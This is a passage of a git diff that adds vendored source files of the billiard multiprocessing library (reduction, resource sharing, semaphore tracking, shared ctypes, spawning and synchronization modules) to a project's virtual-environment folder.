type.''' + def dispatcher(self, obj): + rv = reduce(obj) + self.save_reduce(obj=obj, *rv) + cls.dispatch[type] = dispatcher + + @classmethod + def dumps(cls, obj, protocol=None): + buf = io.BytesIO() + cls(buf, protocol).dump(obj) + return buf.getvalue() + + @classmethod + def loadbuf(cls, buf, protocol=None): + return cls.loads(buf.getvalue()) + + @classmethod + def loads(cls, buf, loads=pickle.loads): + if isinstance(buf, io.BytesIO): + buf = buf.getvalue() + return loads(buf) +register = ForkingPickler.register + + +def dump(obj, file, protocol=None): + '''Replacement for pickle.dump() using ForkingPickler.''' + ForkingPickler(file, protocol).dump(obj) + +# +# Platform specific definitions +# + +if sys.platform == 'win32': + # Windows + __all__ += ['DupHandle', 'duplicate', 'steal_handle'] + from .compat import _winapi + + def duplicate(handle, target_process=None, inheritable=False): + '''Duplicate a handle. (target_process is a handle not a pid!)''' + if target_process is None: + target_process = _winapi.GetCurrentProcess() + return _winapi.DuplicateHandle( + _winapi.GetCurrentProcess(), handle, target_process, + 0, inheritable, _winapi.DUPLICATE_SAME_ACCESS) + + def steal_handle(source_pid, handle): + '''Steal a handle from process identified by source_pid.''' + source_process_handle = _winapi.OpenProcess( + _winapi.PROCESS_DUP_HANDLE, False, source_pid) + try: + return _winapi.DuplicateHandle( + source_process_handle, handle, + _winapi.GetCurrentProcess(), 0, False, + _winapi.DUPLICATE_SAME_ACCESS | _winapi.DUPLICATE_CLOSE_SOURCE) + finally: + _winapi.CloseHandle(source_process_handle) + + def send_handle(conn, handle, destination_pid): + '''Send a handle over a local connection.''' + dh = DupHandle(handle, _winapi.DUPLICATE_SAME_ACCESS, destination_pid) + conn.send(dh) + + def recv_handle(conn): + '''Receive a handle over a local connection.''' + return conn.recv().detach() + + class DupHandle: + '''Picklable wrapper for a handle.''' + def __init__(self, handle, access, pid=None): + if pid is None: + # We just duplicate the handle in the current process and + # let the receiving process steal the handle. 
+ pid = os.getpid() + proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, pid) + try: + self._handle = _winapi.DuplicateHandle( + _winapi.GetCurrentProcess(), + handle, proc, access, False, 0) + finally: + _winapi.CloseHandle(proc) + self._access = access + self._pid = pid + + def detach(self): + '''Get the handle. This should only be called once.''' + # retrieve handle from process which currently owns it + if self._pid == os.getpid(): + # The handle has already been duplicated for this process. + return self._handle + # We must steal the handle from the process whose pid is self._pid. + proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, + self._pid) + try: + return _winapi.DuplicateHandle( + proc, self._handle, _winapi.GetCurrentProcess(), + self._access, False, _winapi.DUPLICATE_CLOSE_SOURCE) + finally: + _winapi.CloseHandle(proc) + +else: + # Unix + __all__ += ['DupFd', 'sendfds', 'recvfds'] + import array + + # On macOS we should acknowledge receipt of fds -- see Issue14669 + ACKNOWLEDGE = sys.platform == 'darwin' + + def sendfds(sock, fds): + '''Send an array of fds over an AF_UNIX socket.''' + fds = array.array('i', fds) + msg = bytes([len(fds) % 256]) + sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)]) + if ACKNOWLEDGE and sock.recv(1) != b'A': + raise RuntimeError('did not receive acknowledgement of fd') + + def recvfds(sock, size): + '''Receive an array of fds over an AF_UNIX socket.''' + a = array.array('i') + bytes_size = a.itemsize * size + msg, ancdata, flags, addr = sock.recvmsg( + 1, socket.CMSG_LEN(bytes_size), + ) + if not msg and not ancdata: + raise EOFError + try: + if ACKNOWLEDGE: + sock.send(b'A') + if len(ancdata) != 1: + raise RuntimeError( + 'received %d items of ancdata' % len(ancdata), + ) + cmsg_level, cmsg_type, cmsg_data = ancdata[0] + if (cmsg_level == socket.SOL_SOCKET and + cmsg_type == socket.SCM_RIGHTS): + if len(cmsg_data) % a.itemsize != 0: + raise ValueError + a.frombytes(cmsg_data) + assert len(a) % 256 == msg[0] + return list(a) + except (ValueError, IndexError): + pass + raise RuntimeError('Invalid data received') + + def send_handle(conn, handle, destination_pid): # noqa + '''Send a handle over a local connection.''' + fd = conn.fileno() + with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s: + sendfds(s, [handle]) + + def recv_handle(conn): # noqa + '''Receive a handle over a local connection.''' + fd = conn.fileno() + with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s: + return recvfds(s, 1)[0] + + def DupFd(fd): + '''Return a wrapper for an fd.''' + popen_obj = context.get_spawning_popen() + if popen_obj is not None: + return popen_obj.DupFd(popen_obj.duplicate_for_child(fd)) + elif HAVE_SEND_HANDLE: + from . 
import resource_sharer + return resource_sharer.DupFd(fd) + else: + raise ValueError('SCM_RIGHTS appears not to be available') + +# +# Try making some callable types picklable +# + + +def _reduce_method(m): + if m.__self__ is None: + return getattr, (m.__class__, m.__func__.__name__) + else: + return getattr, (m.__self__, m.__func__.__name__) + + +class _C: + def f(self): + pass +register(type(_C().f), _reduce_method) + + +def _reduce_method_descriptor(m): + return getattr, (m.__objclass__, m.__name__) +register(type(list.append), _reduce_method_descriptor) +register(type(int.__add__), _reduce_method_descriptor) + + +def _reduce_partial(p): + return _rebuild_partial, (p.func, p.args, p.keywords or {}) + + +def _rebuild_partial(func, args, keywords): + return functools.partial(func, *args, **keywords) +register(functools.partial, _reduce_partial) + +# +# Make sockets picklable +# + +if sys.platform == 'win32': + + def _reduce_socket(s): + from .resource_sharer import DupSocket + return _rebuild_socket, (DupSocket(s),) + + def _rebuild_socket(ds): + return ds.detach() + register(socket.socket, _reduce_socket) + +else: + + def _reduce_socket(s): # noqa + df = DupFd(s.fileno()) + return _rebuild_socket, (df, s.family, s.type, s.proto) + + def _rebuild_socket(df, family, type, proto): # noqa + fd = df.detach() + return socket.socket(family, type, proto, fileno=fd) + register(socket.socket, _reduce_socket) diff --git a/env/Lib/site-packages/billiard/resource_sharer.py b/env/Lib/site-packages/billiard/resource_sharer.py new file mode 100644 index 00000000..243f5e39 --- /dev/null +++ b/env/Lib/site-packages/billiard/resource_sharer.py @@ -0,0 +1,162 @@ +# +# We use a background thread for sharing fds on Unix, and for sharing +# sockets on Windows. +# +# A client which wants to pickle a resource registers it with the resource +# sharer and gets an identifier in return. The unpickling process will connect +# to the resource sharer, sends the identifier and its pid, and then receives +# the resource. +# + +import os +import signal +import socket +import sys +import threading + +from . import process +from . import reduction +from . import util + +__all__ = ['stop'] + + +if sys.platform == 'win32': + __all__ += ['DupSocket'] + + class DupSocket: + '''Picklable wrapper for a socket.''' + + def __init__(self, sock): + new_sock = sock.dup() + + def send(conn, pid): + share = new_sock.share(pid) + conn.send_bytes(share) + self._id = _resource_sharer.register(send, new_sock.close) + + def detach(self): + '''Get the socket. This should only be called once.''' + with _resource_sharer.get_connection(self._id) as conn: + share = conn.recv_bytes() + return socket.fromshare(share) + +else: + __all__ += ['DupFd'] + + class DupFd: + '''Wrapper for fd which can be used at any time.''' + def __init__(self, fd): + new_fd = os.dup(fd) + + def send(conn, pid): + reduction.send_handle(conn, new_fd, pid) + + def close(): + os.close(new_fd) + self._id = _resource_sharer.register(send, close) + + def detach(self): + '''Get the fd. 
This should only be called once.''' + with _resource_sharer.get_connection(self._id) as conn: + return reduction.recv_handle(conn) + + +class _ResourceSharer: + '''Manager for resources using background thread.''' + def __init__(self): + self._key = 0 + self._cache = {} + self._old_locks = [] + self._lock = threading.Lock() + self._listener = None + self._address = None + self._thread = None + util.register_after_fork(self, _ResourceSharer._afterfork) + + def register(self, send, close): + '''Register resource, returning an identifier.''' + with self._lock: + if self._address is None: + self._start() + self._key += 1 + self._cache[self._key] = (send, close) + return (self._address, self._key) + + @staticmethod + def get_connection(ident): + '''Return connection from which to receive identified resource.''' + from .connection import Client + address, key = ident + c = Client(address, authkey=process.current_process().authkey) + c.send((key, os.getpid())) + return c + + def stop(self, timeout=None): + '''Stop the background thread and clear registered resources.''' + from .connection import Client + with self._lock: + if self._address is not None: + c = Client(self._address, + authkey=process.current_process().authkey) + c.send(None) + c.close() + self._thread.join(timeout) + if self._thread.is_alive(): + util.sub_warning('_ResourceSharer thread did ' + 'not stop when asked') + self._listener.close() + self._thread = None + self._address = None + self._listener = None + for key, (send, close) in self._cache.items(): + close() + self._cache.clear() + + def _afterfork(self): + for key, (send, close) in self._cache.items(): + close() + self._cache.clear() + # If self._lock was locked at the time of the fork, it may be broken + # -- see issue 6721. Replace it without letting it be gc'ed. + self._old_locks.append(self._lock) + self._lock = threading.Lock() + if self._listener is not None: + self._listener.close() + self._listener = None + self._address = None + self._thread = None + + def _start(self): + from .connection import Listener + assert self._listener is None + util.debug('starting listener and thread for sending handles') + self._listener = Listener(authkey=process.current_process().authkey) + self._address = self._listener.address + t = threading.Thread(target=self._serve) + t.daemon = True + t.start() + self._thread = t + + def _serve(self): + if hasattr(signal, 'pthread_sigmask'): + signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG)) + while 1: + try: + with self._listener.accept() as conn: + msg = conn.recv() + if msg is None: + break + key, destination_pid = msg + send, close = self._cache.pop(key) + try: + send(conn, destination_pid) + finally: + close() + except: + if not util.is_exiting(): + sys.excepthook(*sys.exc_info()) + + +_resource_sharer = _ResourceSharer() +stop = _resource_sharer.stop diff --git a/env/Lib/site-packages/billiard/semaphore_tracker.py b/env/Lib/site-packages/billiard/semaphore_tracker.py new file mode 100644 index 00000000..8ba0df4a --- /dev/null +++ b/env/Lib/site-packages/billiard/semaphore_tracker.py @@ -0,0 +1,146 @@ +# +# On Unix we run a server process which keeps track of unlinked +# semaphores. The server ignores SIGINT and SIGTERM and reads from a +# pipe. Every other process of the program has a copy of the writable +# end of the pipe, so we get EOF when all other processes have exited. +# Then the server process unlinks any remaining semaphore names. 
+# +# This is important because the system only supports a limited number +# of named semaphores, and they will not be automatically removed till +# the next reboot. Without this semaphore tracker process, "killall +# python" would probably leave unlinked semaphores. +# + +import io +import os +import signal +import sys +import threading +import warnings +from ._ext import _billiard + +from . import spawn +from . import util + +from .compat import spawnv_passfds + +__all__ = ['ensure_running', 'register', 'unregister'] + + +class SemaphoreTracker: + + def __init__(self): + self._lock = threading.Lock() + self._fd = None + + def getfd(self): + self.ensure_running() + return self._fd + + def ensure_running(self): + '''Make sure that semaphore tracker process is running. + + This can be run from any process. Usually a child process will use + the semaphore created by its parent.''' + with self._lock: + if self._fd is not None: + return + fds_to_pass = [] + try: + fds_to_pass.append(sys.stderr.fileno()) + except Exception: + pass + cmd = 'from billiard.semaphore_tracker import main;main(%d)' + r, w = os.pipe() + try: + fds_to_pass.append(r) + # process will out live us, so no need to wait on pid + exe = spawn.get_executable() + args = [exe] + util._args_from_interpreter_flags() + args += ['-c', cmd % r] + spawnv_passfds(exe, args, fds_to_pass) + except: + os.close(w) + raise + else: + self._fd = w + finally: + os.close(r) + + def register(self, name): + '''Register name of semaphore with semaphore tracker.''' + self._send('REGISTER', name) + + def unregister(self, name): + '''Unregister name of semaphore with semaphore tracker.''' + self._send('UNREGISTER', name) + + def _send(self, cmd, name): + self.ensure_running() + msg = '{0}:{1}\n'.format(cmd, name).encode('ascii') + if len(name) > 512: + # posix guarantees that writes to a pipe of less than PIPE_BUF + # bytes are atomic, and that PIPE_BUF >= 512 + raise ValueError('name too long') + nbytes = os.write(self._fd, msg) + assert nbytes == len(msg) + + +_semaphore_tracker = SemaphoreTracker() +ensure_running = _semaphore_tracker.ensure_running +register = _semaphore_tracker.register +unregister = _semaphore_tracker.unregister +getfd = _semaphore_tracker.getfd + + +def main(fd): + '''Run semaphore tracker.''' + # protect the process from ^C and "killall python" etc + signal.signal(signal.SIGINT, signal.SIG_IGN) + signal.signal(signal.SIGTERM, signal.SIG_IGN) + + for f in (sys.stdin, sys.stdout): + try: + f.close() + except Exception: + pass + + cache = set() + try: + # keep track of registered/unregistered semaphores + with io.open(fd, 'rb') as f: + for line in f: + try: + cmd, name = line.strip().split(b':') + if cmd == b'REGISTER': + cache.add(name) + elif cmd == b'UNREGISTER': + cache.remove(name) + else: + raise RuntimeError('unrecognized command %r' % cmd) + except Exception: + try: + sys.excepthook(*sys.exc_info()) + except: + pass + finally: + # all processes have terminated; cleanup any remaining semaphores + if cache: + try: + warnings.warn('semaphore_tracker: There appear to be %d ' + 'leaked semaphores to clean up at shutdown' % + len(cache)) + except Exception: + pass + for name in cache: + # For some reason the process which created and registered this + # semaphore has failed to unregister it. Presumably it has died. + # We therefore unlink it. 
+ try: + name = name.decode('ascii') + try: + _billiard.sem_unlink(name) + except Exception as e: + warnings.warn('semaphore_tracker: %r: %s' % (name, e)) + finally: + pass diff --git a/env/Lib/site-packages/billiard/sharedctypes.py b/env/Lib/site-packages/billiard/sharedctypes.py new file mode 100644 index 00000000..0b6589bf --- /dev/null +++ b/env/Lib/site-packages/billiard/sharedctypes.py @@ -0,0 +1,258 @@ +# +# Module which supports allocation of ctypes objects from shared memory +# +# multiprocessing/sharedctypes.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import ctypes +import sys +import weakref + +from . import heap +from . import get_context +from .context import assert_spawning +from .reduction import ForkingPickler + +__all__ = ['RawValue', 'RawArray', 'Value', 'Array', 'copy', 'synchronized'] + +PY3 = sys.version_info[0] == 3 + +typecode_to_type = { + 'c': ctypes.c_char, 'u': ctypes.c_wchar, + 'b': ctypes.c_byte, 'B': ctypes.c_ubyte, + 'h': ctypes.c_short, 'H': ctypes.c_ushort, + 'i': ctypes.c_int, 'I': ctypes.c_uint, + 'l': ctypes.c_long, 'L': ctypes.c_ulong, + 'f': ctypes.c_float, 'd': ctypes.c_double +} + + +def _new_value(type_): + size = ctypes.sizeof(type_) + wrapper = heap.BufferWrapper(size) + return rebuild_ctype(type_, wrapper, None) + + +def RawValue(typecode_or_type, *args): + ''' + Returns a ctypes object allocated from shared memory + ''' + type_ = typecode_to_type.get(typecode_or_type, typecode_or_type) + obj = _new_value(type_) + ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj)) + obj.__init__(*args) + return obj + + +def RawArray(typecode_or_type, size_or_initializer): + ''' + Returns a ctypes array allocated from shared memory + ''' + type_ = typecode_to_type.get(typecode_or_type, typecode_or_type) + if isinstance(size_or_initializer, int): + type_ = type_ * size_or_initializer + obj = _new_value(type_) + ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj)) + return obj + else: + type_ = type_ * len(size_or_initializer) + result = _new_value(type_) + result.__init__(*size_or_initializer) + return result + + +def Value(typecode_or_type, *args, **kwds): + ''' + Return a synchronization wrapper for a Value + ''' + lock = kwds.pop('lock', None) + ctx = kwds.pop('ctx', None) + if kwds: + raise ValueError( + 'unrecognized keyword argument(s): %s' % list(kwds.keys())) + obj = RawValue(typecode_or_type, *args) + if lock is False: + return obj + if lock in (True, None): + ctx = ctx or get_context() + lock = ctx.RLock() + if not hasattr(lock, 'acquire'): + raise AttributeError("'%r' has no method 'acquire'" % lock) + return synchronized(obj, lock, ctx=ctx) + + +def Array(typecode_or_type, size_or_initializer, **kwds): + ''' + Return a synchronization wrapper for a RawArray + ''' + lock = kwds.pop('lock', None) + ctx = kwds.pop('ctx', None) + if kwds: + raise ValueError( + 'unrecognized keyword argument(s): %s' % list(kwds.keys())) + obj = RawArray(typecode_or_type, size_or_initializer) + if lock is False: + return obj + if lock in (True, None): + ctx = ctx or get_context() + lock = ctx.RLock() + if not hasattr(lock, 'acquire'): + raise AttributeError("'%r' has no method 'acquire'" % lock) + return synchronized(obj, lock, ctx=ctx) + + +def copy(obj): + new_obj = _new_value(type(obj)) + ctypes.pointer(new_obj)[0] = obj + return new_obj + + +def synchronized(obj, lock=None, ctx=None): + assert not isinstance(obj, SynchronizedBase), 'object already synchronized' + ctx = ctx or get_context() + + if 
isinstance(obj, ctypes._SimpleCData): + return Synchronized(obj, lock, ctx) + elif isinstance(obj, ctypes.Array): + if obj._type_ is ctypes.c_char: + return SynchronizedString(obj, lock, ctx) + return SynchronizedArray(obj, lock, ctx) + else: + cls = type(obj) + try: + scls = class_cache[cls] + except KeyError: + names = [field[0] for field in cls._fields_] + d = dict((name, make_property(name)) for name in names) + classname = 'Synchronized' + cls.__name__ + scls = class_cache[cls] = type(classname, (SynchronizedBase,), d) + return scls(obj, lock, ctx) + +# +# Functions for pickling/unpickling +# + + +def reduce_ctype(obj): + assert_spawning(obj) + if isinstance(obj, ctypes.Array): + return rebuild_ctype, (obj._type_, obj._wrapper, obj._length_) + else: + return rebuild_ctype, (type(obj), obj._wrapper, None) + + +def rebuild_ctype(type_, wrapper, length): + if length is not None: + type_ = type_ * length + ForkingPickler.register(type_, reduce_ctype) + if PY3: + buf = wrapper.create_memoryview() + obj = type_.from_buffer(buf) + else: + obj = type_.from_address(wrapper.get_address()) + obj._wrapper = wrapper + return obj + +# +# Function to create properties +# + + +def make_property(name): + try: + return prop_cache[name] + except KeyError: + d = {} + exec(template % ((name, ) * 7), d) + prop_cache[name] = d[name] + return d[name] + + +template = ''' +def get%s(self): + self.acquire() + try: + return self._obj.%s + finally: + self.release() +def set%s(self, value): + self.acquire() + try: + self._obj.%s = value + finally: + self.release() +%s = property(get%s, set%s) +''' + +prop_cache = {} +class_cache = weakref.WeakKeyDictionary() + +# +# Synchronized wrappers +# + + +class SynchronizedBase: + + def __init__(self, obj, lock=None, ctx=None): + self._obj = obj + if lock: + self._lock = lock + else: + ctx = ctx or get_context(force=True) + self._lock = ctx.RLock() + self.acquire = self._lock.acquire + self.release = self._lock.release + + def __enter__(self): + return self._lock.__enter__() + + def __exit__(self, *args): + return self._lock.__exit__(*args) + + def __reduce__(self): + assert_spawning(self) + return synchronized, (self._obj, self._lock) + + def get_obj(self): + return self._obj + + def get_lock(self): + return self._lock + + def __repr__(self): + return '<%s wrapper for %s>' % (type(self).__name__, self._obj) + + +class Synchronized(SynchronizedBase): + value = make_property('value') + + +class SynchronizedArray(SynchronizedBase): + + def __len__(self): + return len(self._obj) + + def __getitem__(self, i): + with self: + return self._obj[i] + + def __setitem__(self, i, value): + with self: + self._obj[i] = value + + def __getslice__(self, start, stop): + with self: + return self._obj[start:stop] + + def __setslice__(self, start, stop, values): + with self: + self._obj[start:stop] = values + + +class SynchronizedString(SynchronizedArray): + value = make_property('value') + raw = make_property('raw') diff --git a/env/Lib/site-packages/billiard/spawn.py b/env/Lib/site-packages/billiard/spawn.py new file mode 100644 index 00000000..9a294773 --- /dev/null +++ b/env/Lib/site-packages/billiard/spawn.py @@ -0,0 +1,389 @@ +# +# Code used to start processes when using the spawn or forkserver +# start methods. +# +# multiprocessing/spawn.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import io +import os +import pickle +import sys +import runpy +import types +import warnings + +from . import get_start_method, set_start_method +from . 
import process +from . import util + +__all__ = ['_main', 'freeze_support', 'set_executable', 'get_executable', + 'get_preparation_data', 'get_command_line', 'import_main_path'] + +W_OLD_DJANGO_LAYOUT = """\ +Will add directory %r to path! This is necessary to accommodate \ +pre-Django 1.4 layouts using setup_environ. +You can skip this warning by adding a DJANGO_SETTINGS_MODULE=settings \ +environment variable. +""" + +# +# _python_exe is the assumed path to the python executable. +# People embedding Python want to modify it. +# + +if sys.platform != 'win32': + WINEXE = False + WINSERVICE = False +else: + WINEXE = (sys.platform == 'win32' and getattr(sys, 'frozen', False)) + WINSERVICE = sys.executable.lower().endswith("pythonservice.exe") + +if WINSERVICE: + _python_exe = os.path.join(sys.exec_prefix, 'python.exe') +else: + _python_exe = sys.executable + + +def _module_parent_dir(mod): + dir, filename = os.path.split(_module_dir(mod)) + if dir == os.curdir or not dir: + dir = os.getcwd() + return dir + + +def _module_dir(mod): + if '__init__.py' in mod.__file__: + return os.path.dirname(mod.__file__) + return mod.__file__ + + +def _Django_old_layout_hack__save(): + if 'DJANGO_PROJECT_DIR' not in os.environ: + try: + settings_name = os.environ['DJANGO_SETTINGS_MODULE'] + except KeyError: + return # not using Django. + + conf_settings = sys.modules.get('django.conf.settings') + configured = conf_settings and conf_settings.configured + try: + project_name, _ = settings_name.split('.', 1) + except ValueError: + return # not modified by setup_environ + + project = __import__(project_name) + try: + project_dir = os.path.normpath(_module_parent_dir(project)) + except AttributeError: + return # dynamically generated module (no __file__) + if configured: + warnings.warn(UserWarning( + W_OLD_DJANGO_LAYOUT % os.path.realpath(project_dir) + )) + os.environ['DJANGO_PROJECT_DIR'] = project_dir + + +def _Django_old_layout_hack__load(): + try: + sys.path.append(os.environ['DJANGO_PROJECT_DIR']) + except KeyError: + pass + + +def set_executable(exe): + global _python_exe + _python_exe = exe + + +def get_executable(): + return _python_exe + +# +# +# + + +def is_forking(argv): + ''' + Return whether commandline indicates we are forking + ''' + if len(argv) >= 2 and argv[1] == '--billiard-fork': + return True + else: + return False + + +def freeze_support(): + ''' + Run code for process object if this in not the main process + ''' + if is_forking(sys.argv): + kwds = {} + for arg in sys.argv[2:]: + name, value = arg.split('=') + if value == 'None': + kwds[name] = None + else: + kwds[name] = int(value) + spawn_main(**kwds) + sys.exit() + + +def get_command_line(**kwds): + ''' + Returns prefix of command line used for spawning a child process + ''' + if getattr(sys, 'frozen', False): + return ([sys.executable, '--billiard-fork'] + + ['%s=%r' % item for item in kwds.items()]) + else: + prog = 'from billiard.spawn import spawn_main; spawn_main(%s)' + prog %= ', '.join('%s=%r' % item for item in kwds.items()) + opts = util._args_from_interpreter_flags() + return [_python_exe] + opts + ['-c', prog, '--billiard-fork'] + + +def spawn_main(pipe_handle, parent_pid=None, tracker_fd=None): + ''' + Run code specified by data received over pipe + ''' + assert is_forking(sys.argv) + if sys.platform == 'win32': + import msvcrt + from .reduction import steal_handle + new_handle = steal_handle(parent_pid, pipe_handle) + fd = msvcrt.open_osfhandle(new_handle, os.O_RDONLY) + else: + from . 
import semaphore_tracker + semaphore_tracker._semaphore_tracker._fd = tracker_fd + fd = pipe_handle + exitcode = _main(fd) + sys.exit(exitcode) + + +def _setup_logging_in_child_hack(): + # Huge hack to make logging before Process.run work. + try: + os.environ["MP_MAIN_FILE"] = sys.modules["__main__"].__file__ + except KeyError: + pass + except AttributeError: + pass + loglevel = os.environ.get("_MP_FORK_LOGLEVEL_") + logfile = os.environ.get("_MP_FORK_LOGFILE_") or None + format = os.environ.get("_MP_FORK_LOGFORMAT_") + if loglevel: + from . import util + import logging + logger = util.get_logger() + logger.setLevel(int(loglevel)) + if not logger.handlers: + logger._rudimentary_setup = True + logfile = logfile or sys.__stderr__ + if hasattr(logfile, "write"): + handler = logging.StreamHandler(logfile) + else: + handler = logging.FileHandler(logfile) + formatter = logging.Formatter( + format or util.DEFAULT_LOGGING_FORMAT, + ) + handler.setFormatter(formatter) + logger.addHandler(handler) + + +def _main(fd): + _Django_old_layout_hack__load() + with io.open(fd, 'rb', closefd=True) as from_parent: + process.current_process()._inheriting = True + try: + preparation_data = pickle.load(from_parent) + prepare(preparation_data) + _setup_logging_in_child_hack() + self = pickle.load(from_parent) + finally: + del process.current_process()._inheriting + return self._bootstrap() + + +def _check_not_importing_main(): + if getattr(process.current_process(), '_inheriting', False): + raise RuntimeError(''' + An attempt has been made to start a new process before the + current process has finished its bootstrapping phase. + + This probably means that you are not using fork to start your + child processes and you have forgotten to use the proper idiom + in the main module: + + if __name__ == '__main__': + freeze_support() + ... 
+ + The "freeze_support()" line can be omitted if the program + is not going to be frozen to produce an executable.''') + + +def get_preparation_data(name): + ''' + Return info about parent needed by child to unpickle process object + ''' + _check_not_importing_main() + d = dict( + log_to_stderr=util._log_to_stderr, + authkey=process.current_process().authkey, + ) + + if util._logger is not None: + d['log_level'] = util._logger.getEffectiveLevel() + + sys_path = sys.path[:] + try: + i = sys_path.index('') + except ValueError: + pass + else: + sys_path[i] = process.ORIGINAL_DIR + + d.update( + name=name, + sys_path=sys_path, + sys_argv=sys.argv, + orig_dir=process.ORIGINAL_DIR, + dir=os.getcwd(), + start_method=get_start_method(), + ) + + # Figure out whether to initialise main in the subprocess as a module + # or through direct execution (or to leave it alone entirely) + main_module = sys.modules['__main__'] + try: + main_mod_name = main_module.__spec__.name + except AttributeError: + main_mod_name = main_module.__name__ + if main_mod_name is not None: + d['init_main_from_name'] = main_mod_name + elif sys.platform != 'win32' or (not WINEXE and not WINSERVICE): + main_path = getattr(main_module, '__file__', None) + if main_path is not None: + if (not os.path.isabs(main_path) and + process.ORIGINAL_DIR is not None): + main_path = os.path.join(process.ORIGINAL_DIR, main_path) + d['init_main_from_path'] = os.path.normpath(main_path) + + return d + +# +# Prepare current process +# + + +old_main_modules = [] + + +def prepare(data): + ''' + Try to get current process ready to unpickle process object + ''' + if 'name' in data: + process.current_process().name = data['name'] + + if 'authkey' in data: + process.current_process().authkey = data['authkey'] + + if 'log_to_stderr' in data and data['log_to_stderr']: + util.log_to_stderr() + + if 'log_level' in data: + util.get_logger().setLevel(data['log_level']) + + if 'sys_path' in data: + sys.path = data['sys_path'] + + if 'sys_argv' in data: + sys.argv = data['sys_argv'] + + if 'dir' in data: + os.chdir(data['dir']) + + if 'orig_dir' in data: + process.ORIGINAL_DIR = data['orig_dir'] + + if 'start_method' in data: + set_start_method(data['start_method']) + + if 'init_main_from_name' in data: + _fixup_main_from_name(data['init_main_from_name']) + elif 'init_main_from_path' in data: + _fixup_main_from_path(data['init_main_from_path']) + +# Multiprocessing module helpers to fix up the main module in +# spawned subprocesses + + +def _fixup_main_from_name(mod_name): + # __main__.py files for packages, directories, zip archives, etc, run + # their "main only" code unconditionally, so we don't even try to + # populate anything in __main__, nor do we make any changes to + # __main__ attributes + current_main = sys.modules['__main__'] + if mod_name == "__main__" or mod_name.endswith(".__main__"): + return + + # If this process was forked, __main__ may already be populated + try: + current_main_name = current_main.__spec__.name + except AttributeError: + current_main_name = current_main.__name__ + + if current_main_name == mod_name: + return + + # Otherwise, __main__ may contain some non-main code where we need to + # support unpickling it properly. 
We rerun it as __mp_main__ and make + # the normal __main__ an alias to that + old_main_modules.append(current_main) + main_module = types.ModuleType("__mp_main__") + main_content = runpy.run_module(mod_name, + run_name="__mp_main__", + alter_sys=True) + main_module.__dict__.update(main_content) + sys.modules['__main__'] = sys.modules['__mp_main__'] = main_module + + +def _fixup_main_from_path(main_path): + # If this process was forked, __main__ may already be populated + current_main = sys.modules['__main__'] + + # Unfortunately, the main ipython launch script historically had no + # "if __name__ == '__main__'" guard, so we work around that + # by treating it like a __main__.py file + # See https://github.com/ipython/ipython/issues/4698 + main_name = os.path.splitext(os.path.basename(main_path))[0] + if main_name == 'ipython': + return + + # Otherwise, if __file__ already has the setting we expect, + # there's nothing more to do + if getattr(current_main, '__file__', None) == main_path: + return + + # If the parent process has sent a path through rather than a module + # name we assume it is an executable script that may contain + # non-main code that needs to be executed + old_main_modules.append(current_main) + main_module = types.ModuleType("__mp_main__") + main_content = runpy.run_path(main_path, + run_name="__mp_main__") + main_module.__dict__.update(main_content) + sys.modules['__main__'] = sys.modules['__mp_main__'] = main_module + + +def import_main_path(main_path): + ''' + Set sys.modules['__main__'] to module at main_path + ''' + _fixup_main_from_path(main_path) diff --git a/env/Lib/site-packages/billiard/synchronize.py b/env/Lib/site-packages/billiard/synchronize.py new file mode 100644 index 00000000..c864064a --- /dev/null +++ b/env/Lib/site-packages/billiard/synchronize.py @@ -0,0 +1,436 @@ +# +# Module implementing synchronization primitives +# +# multiprocessing/synchronize.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import errno +import sys +import tempfile +import threading + +from . import context +from . import process +from . import util + +from ._ext import _billiard, ensure_SemLock +from time import monotonic + +__all__ = [ + 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', +] + +# Try to import the mp.synchronize module cleanly, if it fails +# raise ImportError for platforms lacking a working sem_open implementation. 
+# See issue 3770 +ensure_SemLock() + +# +# Constants +# + +RECURSIVE_MUTEX, SEMAPHORE = list(range(2)) +SEM_VALUE_MAX = _billiard.SemLock.SEM_VALUE_MAX + +try: + sem_unlink = _billiard.SemLock.sem_unlink +except AttributeError: # pragma: no cover + try: + # Py3.4+ implements sem_unlink and the semaphore must be named + from _multiprocessing import sem_unlink # noqa + except ImportError: + sem_unlink = None # noqa + +# +# Base class for semaphores and mutexes; wraps `_billiard.SemLock` +# + + +def _semname(sl): + try: + return sl.name + except AttributeError: + pass + + +class SemLock: + _rand = tempfile._RandomNameSequence() + + def __init__(self, kind, value, maxvalue, ctx=None): + if ctx is None: + ctx = context._default_context.get_context() + name = ctx.get_start_method() + unlink_now = sys.platform == 'win32' or name == 'fork' + if sem_unlink: + for i in range(100): + try: + sl = self._semlock = _billiard.SemLock( + kind, value, maxvalue, self._make_name(), unlink_now, + ) + except (OSError, IOError) as exc: + if getattr(exc, 'errno', None) != errno.EEXIST: + raise + else: + break + else: + exc = IOError('cannot find file for semaphore') + exc.errno = errno.EEXIST + raise exc + else: + sl = self._semlock = _billiard.SemLock(kind, value, maxvalue) + + util.debug('created semlock with handle %s', sl.handle) + self._make_methods() + + if sem_unlink: + + if sys.platform != 'win32': + def _after_fork(obj): + obj._semlock._after_fork() + util.register_after_fork(self, _after_fork) + + if _semname(self._semlock) is not None: + # We only get here if we are on Unix with forking + # disabled. When the object is garbage collected or the + # process shuts down we unlink the semaphore name + from .semaphore_tracker import register + register(self._semlock.name) + util.Finalize(self, SemLock._cleanup, (self._semlock.name,), + exitpriority=0) + + @staticmethod + def _cleanup(name): + from .semaphore_tracker import unregister + sem_unlink(name) + unregister(name) + + def _make_methods(self): + self.acquire = self._semlock.acquire + self.release = self._semlock.release + + def __enter__(self): + return self._semlock.__enter__() + + def __exit__(self, *args): + return self._semlock.__exit__(*args) + + def __getstate__(self): + context.assert_spawning(self) + sl = self._semlock + if sys.platform == 'win32': + h = 